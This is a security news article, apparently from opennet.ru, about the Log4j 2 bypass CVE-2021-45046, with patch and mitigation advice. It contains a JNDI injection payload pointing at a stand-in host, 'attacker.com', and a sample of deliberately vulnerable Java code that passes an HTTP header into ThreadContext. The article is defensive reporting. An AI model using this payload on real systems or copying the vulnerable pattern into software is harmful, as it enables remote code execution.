A new attack vector for Log4j 2 that bypasses the added protection

Another vulnerability has been identified in the implementation of JNDI lookups in the Log4j 2 library (CVE-2021-45046). It manifests despite the fixes added in release 2.15 and regardless of whether the "log4j2.noFormatMsgLookup" protective setting is used. The problem is especially dangerous for older versions of Log4j 2 that are protected only with the "noFormatMsgLookup" flag, since it allows bypassing the protection against the previous vulnerability (Log4Shell, CVE-2021-44228), which makes it possible to execute arbitrary code on the server. For users of version 2.15, exploitation is limited to crashing the application through exhaustion of available resources.

The vulnerability appears only on systems that use Context Lookups in logging, such as ${ctx:loginId}, or MDC (Thread Context Map) templates such as %X, %mdc and %MDC. Exploitation comes down to creating the conditions for data containing a JNDI substitution to be written to the log, when the application uses context lookups or MDC templates in the rules that define how log output is formatted.

Researchers from LunaSec noted that for Log4j versions below 2.15, this vulnerability can be used as a new vector for Log4Shell attacks leading to code execution, if ThreadContext expressions that incorporate external data are used in log output, regardless of whether the protective "noMsgFormatLookups" flag or "%m{nolookups}" is enabled.

The bypass of the protection comes down to this: instead of substituting "${jndi:ldap://attacker.com/a}" directly, the expression is substituted through the value of an intermediate variable that is used in the output formatting rules. For example, if the context lookup ${ctx:apiversion} is used in log output, the attack can be carried out by writing the data "${jndi:ldap://attacker.com/a}" into the value stored in the apiversion variable. Example of vulnerable code:

appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

@GetMapping("/")
public String index(@RequestHeader("X-Api-Version") String apiVersion) {
    // The "X-Api-Version" HTTP header is passed into the ThreadContext
    ThreadContext.put("apiversion", apiVersion);
    // When the log line is written, the external apiversion value is resolved
    // through the ${ctx:apiversion} substitution in the layout pattern
    logger.info("Received a request for API version");
    return "Hello, world!";
}

In Log4j version 2.15, the vulnerability can be used to carry out a DoS attack by passing a value into ThreadContext that causes a loop in the processing of the format template.

Fixes 2.16 and 2.12.2 have been released to block the vulnerability. In the Log4j 2.16 branch, in addition to the fixes made in version 2.15 and the restriction of JNDI LDAP requests to "localhost", JNDI functionality is completely disabled by default and support for message substitution templates has been removed. As a protective measure, it is recommended to remove the JndiLookup class from the class path (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").

You can track the appearance of fixes in packages on the distribution pages (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) and those of Java platform vendors (GitHub, Docker, Oracle, VMware, Broadcom and Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, and others).

Source: opennet.ru